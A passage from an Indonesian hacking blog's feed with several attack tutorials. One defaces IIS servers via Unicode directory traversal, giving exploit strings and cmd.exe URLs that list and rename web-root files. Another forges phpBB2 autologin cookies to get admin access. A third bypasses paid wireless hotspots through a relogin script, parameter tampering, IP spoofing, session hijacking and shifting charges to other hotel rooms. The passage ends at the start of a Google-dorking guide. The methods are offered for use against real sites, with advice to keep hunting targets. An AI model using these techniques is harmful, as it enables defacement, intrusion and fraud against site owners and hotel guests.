perintah "ipconfig.exe /all"&lt;br /&gt;&lt;br /&gt;Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada&lt;br /&gt;browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering&lt;br /&gt;tembus adalah :&lt;br /&gt;- /cgi-bin/..%255c..%255c&lt;br /&gt;- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..&lt;br /&gt;- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /scripts/..%255c..%255c&lt;br /&gt;&lt;br /&gt;Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka&lt;br /&gt;kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).&lt;br /&gt;&lt;br /&gt;Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah&lt;br /&gt;mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,&lt;br /&gt;index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.&lt;br /&gt;Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau&lt;br /&gt;D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini&lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set&lt;br /&gt;&lt;br /&gt;URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...&lt;br /&gt;Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :&lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot&lt;br /&gt;&lt;br /&gt;Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih&lt;br /&gt;lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....&lt;br /&gt;truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....&lt;br /&gt;http://www.targethost.com == neh yg ini......di situ kan alias di&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot&lt;br /&gt;dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di&lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :&lt;br /&gt;Directory of C:\InetPub\wwwroot&lt;br /&gt;07/20/01 03:21p 1,590 default.htm&lt;br /&gt;07/20/01 03:21p 590 index.html&lt;br /&gt;07/20/01 03:21p 3,453 main.html&lt;br /&gt;&lt;br /&gt;Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...&lt;br /&gt;contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :&lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html&lt;br /&gt;&lt;br /&gt;Lihat apa yg terjadi di IE kitaa&lt;br /&gt;&lt;br /&gt;CGI Error&lt;br /&gt;The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:&lt;br /&gt;Access is denied&lt;br /&gt;&lt;br /&gt;Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat&lt;br /&gt;targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??&lt;br /&gt;&lt;br /&gt;CGI Error&lt;br /&gt;The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :&lt;br /&gt;&lt;br /&gt;Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site&lt;br /&gt;tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee&lt;br /&gt;(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk&lt;br /&gt;langkah selanjutnyah*)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..&lt;br /&gt;Kedua lewat TFTP32.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;*Cara pertama :*&lt;br /&gt;Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori&lt;br /&gt;C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe&lt;br /&gt;. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL&lt;br /&gt;berikut :&lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-9117555434170897634?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/9117555434170897634/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=9117555434170897634&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/9117555434170897634'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/9117555434170897634'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/02/deface-ws-iis.html' title='deface WS IIS'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-7676645089466873801</id><published>2008-02-02T02:04:00.000-08:00</published><updated>2008-06-29T03:58:45.000-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20</title><content type='html'>1. Download browser Mozilla FireFox&lt;br /&gt;&lt;br /&gt;2. Download pluginnya yg bernama LiveHTTPHeader&lt;br /&gt;download di http://livehttpheaders.mozdev.org/installation.html&lt;br /&gt;cari yg paling baru&lt;br /&gt;&lt;br /&gt;3. selanjutnya cari target dengan Uncle Google dgn syntax :&lt;br /&gt;phpBB site:[terserah apa aja]&lt;br /&gt;&lt;br /&gt;4. setelah itu buka plugin yg kita download tadi di Tools -&gt; LiveHTTPHeader&lt;br /&gt;&lt;br /&gt;5. Ingat, isi LiveHTTPHeader harus kosong&lt;br /&gt;&lt;br /&gt;6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target&lt;br /&gt;&lt;br /&gt;7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..&lt;br /&gt;&lt;br /&gt;8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...&lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b&lt;br /&gt;&lt;br /&gt;9. Hapus bagian yg belakang setelah tanda semi colon (&lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b&lt;br /&gt;&lt;br /&gt;\_______________hapus bagian ini_________________/&lt;br /&gt;&lt;br /&gt;jadinya akan seperti ini :&lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D&lt;br /&gt;&lt;br /&gt;10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi&lt;br /&gt;&lt;br /&gt;11. selanjutnya perhatikan langkah di bawah ini:&lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D&lt;br /&gt;\________hapus bagian ini dan di ganti dengan:&lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}&lt;br /&gt;&lt;br /&gt;12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.&lt;br /&gt;&lt;br /&gt;13. perhatikan lagi langkah ini:&lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}&lt;br /&gt;\___________________________bagian ini jg digantilagi_______________________________/&lt;br /&gt;&lt;br /&gt;menjadi seperti ini:&lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D&lt;br /&gt;&lt;br /&gt;14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.&lt;br /&gt;&lt;br /&gt;15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.&lt;br /&gt;Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-7676645089466873801?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/7676645089466873801/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=7676645089466873801&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7676645089466873801'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7676645089466873801'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/02/langkah-langkah-deface-phpbbphpbb2.html' title='&lt;p&gt;Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20&lt;br /&gt;'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-7806963836309957214</id><published>2008-02-02T01:53:00.000-08:00</published><updated>2008-06-29T03:52:31.782-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Wireless Hotspot Hacking</title><content type='html'>Pendahuluan&lt;br /&gt;Wireless hotspot merujuk pada implementasi jaringan wireless (nirkabel) yang memanfaatkan protokol IEEE 802.11x untuk keperluan akses Internet publik. Implementasi jaringan wireless ini dapat digunakan tanpa bayar,  biasanya akses diberikan oleh penyedia layanan untuk keperluan promosi,  atau berbayar.&lt;br /&gt;Di kota-kota besar di Indonesia, seperti Jakarta, Bandung, dan Surabaya, wireless hotspot dapat ditemukan di mall, plaza, hotel, atau airport. Dengan ekspetasi pengguna yang beragam, dari geek sampai mereka yang  gagap teknologi, maka wireless hotspot didesain untuk memberikan kemudahan  dalam penggunaan. Oleh karena itu, kebanyakan wireless hotspot tidak  memberikan perlindungan penuh terhadap penyalahgunaan jaringan wireless.&lt;br /&gt;Menggunakan Wireless Hotspot&lt;br /&gt;Jika Anda belum pernah memanfaatkan layanan wireless hotspot, maka langkah-langkah berikut dapat Anda lakukan ketika Anda berada dalam jangkauan akses wireless hotspot.&lt;br /&gt;Siapkan device yang akan digunakan untuk mengakses wireless hotspot.&lt;br /&gt; Device dapat berupa laptop, PDA, atau telepon selular.&lt;br /&gt;2.   Asosiasikan device Anda pada hotspot SSID (Service Set Identifier)&lt;br /&gt; untuk mendapatkan konfigurasi jaringan. Biasanya jaringan wireless&lt;br /&gt; hotspot menggunakan layanan DHCP untuk keperluan ini.&lt;br /&gt;Gunakan web browser untuk mulai mengakses Internet. Jika Anda&lt;br /&gt; mendapatkan tampilan web yang meminta login username dan password&lt;br /&gt; (terkadang cukup password saja), maka Anda harus memasukan username&lt;br /&gt; dan password yang sudah disiapkan. Jika Anda dapat langsung&lt;br /&gt; menggunakan akses Internet, Anda beruntung. Dan mungkin Anda tidak&lt;br /&gt; perlu membaca kelanjutan dari artikel ini. Namun kalau Anda hanya&lt;br /&gt; dapat mengakses beberapa website tertentu saja, besar kemungkinan&lt;br /&gt; Anda akan diminta username dan password untuk mengakses website&lt;br /&gt; yang lainnya.&lt;br /&gt;4.    Jika Anda sudah memasukkan username dan password, dan berhasil&lt;br /&gt; terautentikasi. Anda selanjutnya dapat mengakses Internet sampai&lt;br /&gt; kredit akses Anda habis atau perhitungan akses dihitung setelah Anda&lt;br /&gt; menggunakan akses Internet (ini biasanya berlaku bagi mereka yang&lt;br /&gt; juga adalah pelanggan penyedia layanan Internet).&lt;br /&gt;Mendapatkan Akses&lt;br /&gt;Beberapa cara yang dapat dilakukan untuk mendapatkan akses wireless hotspot,  tergantung dari penyedia layanan, namun secara garis besar Anda dapat  melakukan hal-hal berikut:&lt;br /&gt;1. Membeli prepaid card. Penyedia layanan seperti CBN, Indosat, dan BizNet menyediakan prepaid card dengan nominal tertentu.&lt;br /&gt;2. Membayar hak akses dengan kartu kredit. Berlaku jika penyedia layanan memberikan pilihan ini. Saya hanya menemukan fitur ini pada wireless hotspot di luar negeri.&lt;br /&gt;3. Registrasi via SMS. Penyedia layanan wireless hotspot yang juga  penyedia layanan telekomunikasi selular bergerak biasanya memberikan kemudahan pada pelanggannya. Hak akses online pada wireless hotspot dapat ditukar dengan nilai kredit kartu telepon selular pra-bayar. Saya pernah menemukan Indosat memberikan layanan ini.&lt;br /&gt;4. Mengalihkan tagihan online pada tagihan kamar hotel. Ini berlaku jika Anda menggunakan layanan wireless hotspot dari kamar hotel dimana harga yang harus dibayarkan nanti seringkali jauh lebih mahal. Sebagai contoh, M@giNET bekerja sama dengan hotel Westin di Kuala Lumpur, untuk memberikan layanan wireless akses bagi mereka yang menginap di hotel tersebut.&lt;br /&gt;5. Melakukan aktivitas social engineering untuk mendapatkan username dan password. Silakan mengira-ngira sendiri karena saya tidak akan membahas hal ini.&lt;br /&gt;6. Mencari jalan keluar sendiri untuk mendapatkan username dan password atau untuk langsung dapat menggunakan layanan akses Internet. Beberapa trik akan dijelaskan pada bagian lain di artikel ini.&lt;br /&gt;Analisis Desain Wireless Hotspot&lt;br /&gt;Beberapa hal yang saya berhasil saya simpulkan dari sejumlah implementasi wireless&lt;br /&gt; hotspot yang telah saya coba, antara lain:&lt;br /&gt;1. Tidak adanya standarisasi untuk setup sebuah hotspot. Dengan kata lain, setup jaringan dari penyedia layanan akan berbeda dengan  penyedia layanan yang lain. Hal lain yang berpengaruh adalah  pemilihan produk.&lt;br /&gt;2. Banyak dari penyedia layanan wireless hotspot yang memberikan akses roaming, memungkinkan pengguna untuk mengakses layanan di tempat yang berbeda asalkan ada layanan dari penyedia yang dimaksud. Sebagai contoh, jika Anda memiliki hak akses untuk layanan wireless hotspot yang disediakan oleh Indosat, maka Anda dapat mengakses dilebih dari 30 tempat, dengan akses point berjumlah lebih dari 190 buah. Dan sebagai informasi tambahan, kesemua akses point tersebut semuanya terhubung dan dikontrol dari pusat.&lt;br /&gt;3. Autentikasi biasanya digunakan untuk keperluan akses Internet. Yang berarti jika Anda terhubung ke sebuah akses point wireless  hotspot namun tidak ingin mendapatkan akses Internet, Anda masih dapat menggunakan jaringan wireless secara lokal dan berhubungan&lt;br /&gt; dengan pengguna jaringan wireless yang lain (jika dan hanya jika  penyedia layanan mengijinkan hal ini).&lt;br /&gt;4. Untuk keperluan autentikasi, penyedia layanan biasanya akan menyediakan Internet gateway (yang biasanya terdapat web server, DNS server, database server, dan mail server di dalamnya) dan satu atau lebih akses point. Beberapa produk yang sering digunakan sebagai Internet gateway untuk layanan hotspot antara lain  diproduksi oleh ANTLabs (seperti yang digunakan oleh Indosat dan CBN), Nomadix (digunakan oleh M@giNET), perangkat lunak gratis NoCatsAuth atau yang serupa (seperti yang digunakan oleh Melsa).&lt;br /&gt;5. Seringkali tidak ditemukan segregasi jaringan untuk pengguna. Baik bagi mereka yang belum terautentikasi maupun yang belum. Hal ini memungkinkan seseorang melakukan aktivitas hacking terhadap pengguna layanan wireless hotspot yang lain.&lt;br /&gt;6. Juga sering ditemukan para penyedia layanan wireless (ataupun produsen produk Internet gateway) menggunakan aplikasi yang sudah out-of-date. Sebagai contoh, sebuah produk ANTLabs menggunakan Red Hat Linux release 6.2 (Zoot) sebagai sistem operasi.&lt;br /&gt; Terhitung perangkat lunak yang digunakan seperti MySQL, arpd, dan  Apache, juga out-of-date.&lt;br /&gt;Mengakali Proses Autentikasi Wireless Hotspot&lt;br /&gt;Ada banyak hal yang seseorang dapat lakukan untuk mengakali proses autentikasi. Beberapa cara yang dibahas dalam artikel ini hanya mencakup sebagian kecil aspek yang memanfaatkan kelemahan desain dari sebuah wireless hotspot gateway. Mengingat bahwa materi sudah pernah dipresentasikan di depan publik, besar kemungkinan penyedia layanan maupun vendor dari produk-produk yang terkena dampaknya sudah&lt;br /&gt; memperbaiki celah-celah yang dimaksud.&lt;br /&gt;Sebagai pemberitahuan, tidak ada nama vendor yang akan diasosiasikan dengan celah yang saya temukan. Silakan mengira-ngira sendiri. Dan trik-trik yang dijelaskan hanya dapat direplikasikan jika Anda berada dalam environment sistem operasi berbasis Unix/Linux (kebetulan saya menggunakan Mac OS X).&lt;br /&gt;1. Memanfaatkan demo account.&lt;br /&gt;Banyak penyedia layanan yang berbaik-hati memberikan kesempatan bagi calon pengguna untuk dapat mengakses Internet dalam kurun waktu yang dibatasi. Pada halaman autentikasi biasanya disebutkan username dan password untuk keperluan ujicoba.  Seseorang yang menggunakan account ujicoba/demo harus melakukan autentikasi ulang setelah masa penggunaan berakhir. Namun hal tersebut dapat dilakukan secara otomatis dengan menggunakan script seperti ini.&lt;br /&gt;———————————————————————&lt;br /&gt; #!/bin/sh&lt;br /&gt;while sleep 3;&lt;br /&gt; do&lt;br /&gt; curl –data&lt;br /&gt; “username=demo&amp;password=demo&amp;submitForm=login”&lt;br /&gt; “https://server:port/goform/HtmlLoginRequest”;&lt;br /&gt; done&lt;br /&gt; ———————————————————————&lt;br /&gt;2. Menggunakan tunneling.&lt;br /&gt;Beberapa implementasi hotspot dapat diakali dengan memanfaatkan metode tunneling. Implementasi yang dimaksud adalah implementasi yang tidak melakukan pemblokiran terhadap port atau protokol tertentu. 0×05&lt;br /&gt; Sebagai contoh, sebuah hotspot hanya melakukan pengalihan untuk semua query HTTP dan HTTPS ke halaman login autentikasi bagi pengguna yang belum terautentikasi. Anda dapat menggunakan socks-tunneling via SSH karena port yang digunakan untuk SSH tidak terfilter. Anda dapat menambahkan option ‘DynamicForward’ pada  konfigurasi SSH user Anda (lihat file ~/.ssh/config).&lt;br /&gt;——————————————————————–&lt;br /&gt; …&lt;br /&gt; Host titanium&lt;br /&gt; Hostname titanium.justanotherrandomdomain.com&lt;br /&gt; Port 22&lt;br /&gt; User whfb&lt;br /&gt; DynamicForward 22344&lt;br /&gt; …&lt;br /&gt; ——————————————————————–&lt;br /&gt;Jika Anda sudah melakukan koneksi SSH ke host titanium, maka secara otomatis, port 22344 akan terbuka. Anda dapat menambahkan IP  127.0.0.1 dan port 22344 pada konfigurasi jaringan di web browser  Anda untuk pilihan SOCKS proxy.&lt;br /&gt;Namun cara yang disebutkan di atas tidak selalu berhasil karena gateway melakukan pengalihan pada semua port TCP dan UDP. Untuk  mengakali kondisi tersebut, jika dapat memanfaatkan DNS tunneling. Mengapa protokol DNS? Karena sebagian besar penyedia layanan tidak  melakukan pemblokiran atau pengalihan untuk query DNS.Silakan merujuk pada referensi DNS Tunneling[3][4][5][6][7].&lt;br /&gt;3. Memanfaatkan celah pada aplikasi web portal Internet gateway.&lt;br /&gt;Trik berikut saya temukan ketika saya yang kebetulan mendapatkan kesempatan untuk menginap di salah satu hotel terkenal dan menemukan adanya layanan wireless hotspot yang terdapat di lobby. Pada halaman autentikasi, saya diberikan beberapa pilihan untuk&lt;br /&gt; melakukan pembayaran, antara lain:&lt;br /&gt;a. login menggunakan username dan password dari pre-paid yang dapat dibeli di lobby,&lt;br /&gt; b. login menggunakan username dan password dari layanan iPass dan Boingo&lt;br /&gt;Setelah mengamati benar source-code dari halaman web yang digunakan untuk keperluan autentikasi, saya melihat adanya kejanggalan dimana pilihan a mempunyai billing_method_id adalah 2, dan pilihan b mempunyai billing _method_id adalah 3. Yang jadi pertanyaan saya waktu itu adalah pilihan apa yang mempunyai billing_method_id&lt;br /&gt; adalah 1. Dengan niatan mencoba-coba, saya lalu mengganti variable query billing_method_id dengan nilai 1, ternyata saya dapat  langsung mengakses Internet.&lt;br /&gt;——————————————————————–&lt;br /&gt; http://host/defaultportal/check_form.cgi?&amp;billing_method_id=1&lt;br /&gt; ——————————————————————–&lt;br /&gt;Belakangan hari setelah saya berkesempatan meminjam produk yang digunakan sebagai Internet gateway tersebut, saya mengetahui bahwa billing_method_id dengan nilai 1 adalah pilihan untuk melakukan penagihan pada kamar. Sesuatu yang tidak mungkin dilakukan karena saya mengaksesnya dengan menggunakan wireless dari lobby. Setelah&lt;br /&gt; berkorespondensi dengan technical support vendor produk yang dimaksud, saya baru mengetahui bahwa pilihan tersebut hanya efektif jika pelanggan menggunakan kabel dan bukan wireless.&lt;br /&gt;4. Mengganti IP address&lt;br /&gt;Ditemukan beberapa implementasi wireless hotspot yang diketahui membagi alokasi IP address pada pengguna yang belum terautentikasi dan user yang sudah terautentikasi. Setelah pengguna berhasil melewati proses autentikasi, gateway akan mengingat MAC address Anda dan memberikan IP address baru (pada subnet yang baru) bagi pengguna tersebut.&lt;br /&gt;Menggunakan perangkat lunak packet sniffer seperti tcpdump atau  ethereal (sekarang wireshark), Anda dapat mengetahui IP address apa saja yang melintasi jaringan wireless Anda. Anda dapat mengira-ngira sendiri alokasi IP address yang ‘baru’ berikut dengan netmask-nya. Sebagai contoh, jika belum terautentikasi Anda mendapatkan IP  address 10.0.0.14 dengan netmask 255.255.255.0, dan setelah Anda terautentikasi, Anda mendapatkan IP address 10.0.1.18 dengan netmask 255.255.255.0.&lt;br /&gt;Jika Anda tidak ingin melakukan proses autentikasi, Anda cukup mengkonfigur IP Address Anda pada range network pengguna yang sudah terautentikasi.&lt;br /&gt;5. Piggyjacking&lt;br /&gt;Saya mendefinisikan piggyjacking sebagai aktivitas untuk mendapatkan  akses pada sebuah sesi akses wireless dengan mengambil-alih sesi yang sudah terlebih dahulu terautentikasi untuk mendapatkan akses  Internet.&lt;br /&gt;Untuk melakukannya, Anda membutuhkan informasi:&lt;br /&gt; - IP address dan MAC address pengguna yang sudah terautentikasi&lt;br /&gt; - IP address gateway&lt;br /&gt;Anda dapat merujuk pada presentasi Dean Pierce, Brandon Edwards &amp;  Anthony Lineberry yang diberikan di DEFCON 13[8] untuk penggunaan perangkat lunak ‘pul’. Jika Anda ingin melakukan dengan metode manual, Anda dapat mengikuti prosedur yang disebutkan pada point 4 di atas.&lt;br /&gt;6. SQL Injection pada aplikasi portal gateway&lt;br /&gt;Beberapa hotspot ternyata dapat diakali dengan memanfaatkan teknik  SQL injection. Saya pikir tidak perlu menjelaskan lebih jauh  mengenai teknik ini karena sudah seringkali dibahas. Tidak hanya untuk mem-by-pass akses Internet, teknik ini juga dapat mem-by-pass autentikasi administrative page.&lt;br /&gt;7. Memindahkan tagihan ke kamar lain.&lt;br /&gt;Jika Anda beruntung menginap pada hotel yang memberikan layanan  Internet berbayar menggunakan kabel pada kamar hotel. Anda mungkin dapat menerapkan trik ini. Trik berikut ini hanya dapat dilakukan  pada jaringan kabel pada hotel (tidak berhubungan dengan wireless), namun saya bahas di sini karena produk gateway yang digunakan sama&lt;br /&gt; dengan layanan wireless hotspot. Anda mungkin dapat ‘menyusahkan’ orang lain dengan mengalihkan   tagihan Internet kamar Anda atau mengalihannya ke kamar kosong.&lt;br /&gt;Sebagai contoh, Anda dapat memodifikasi query HTTP seperti berikut  ini&lt;br /&gt; ——————————————————————–&lt;br /&gt; http://HOTSPOT_GATEWAY/mlcbb/mlc/welcome.asp?UI=012345&amp;&lt;br /&gt; UURL=http://BILLING_SERVER/userok.htm&amp;MA=00AABBCCDDEE&amp;RN=1234&amp;&lt;br /&gt; http://google.com/&amp;SC=12345&lt;br /&gt; ——————————————————————–&lt;br /&gt; Anda cukup menganti nilai 00AABBCCDDEE (MAC address) dan 1234 (nomor kamar). Tagihan akan ditujukan pada kamar baru jika kamar  tersebut ada.&lt;br /&gt;Untuk amannya, saya menyarankan Anda mencari informasi nomor ruangan yang digunakan untuk keperluan publik seperti ballroom atau lobby.&lt;br /&gt;&lt;br /&gt;Penulis     : willhackforbandwidth&lt;br /&gt;Sumber    : www.echo.or.id&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-7806963836309957214?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/7806963836309957214/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=7806963836309957214&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7806963836309957214'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7806963836309957214'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/02/wireless-hotspot-hacking.html' title='Wireless Hotspot Hacking'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-1322272385030846110</id><published>2008-02-02T01:32:00.000-08:00</published><updated>2008-06-29T03:52:31.784-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>google hack</title><content type='html'>&lt;p&gt;Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada&lt;br /&gt;Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan&lt;br /&gt;defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari&lt;br /&gt;ribuan website tampilan utamanya berubah.&lt;br /&gt;&lt;br /&gt;Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik&lt;br /&gt;dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan&lt;br /&gt;keyword yang sering digunakan untuk melakukan pencarian file dan juga&lt;br /&gt;bagaimana mencari target dengan memanfaatkan Google.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 01 // Penggunaan Dasar -----------------------------------------------&lt;br /&gt;&lt;br /&gt;- Google tidak "case sensitive".&lt;br /&gt;Keyword: linux = LINUX = LiNuX&lt;br /&gt;Akan menghasilkan hal yang sama&lt;br /&gt;&lt;br /&gt;- AND: Secara Default Google menggunakan keyword and.&lt;br /&gt;Keyword: menjadi hacker&lt;br /&gt;Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"&lt;br /&gt;&lt;br /&gt;- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah&lt;br /&gt;satu dari keyword. Note: OR dituliskan dengan huruf besar semua.&lt;br /&gt;Keyword: hacker OR cracker&lt;br /&gt;Hasilnya pencarian akan mengandung kata "hacker" atau "cracker"&lt;br /&gt;&lt;br /&gt;- +: Google akan 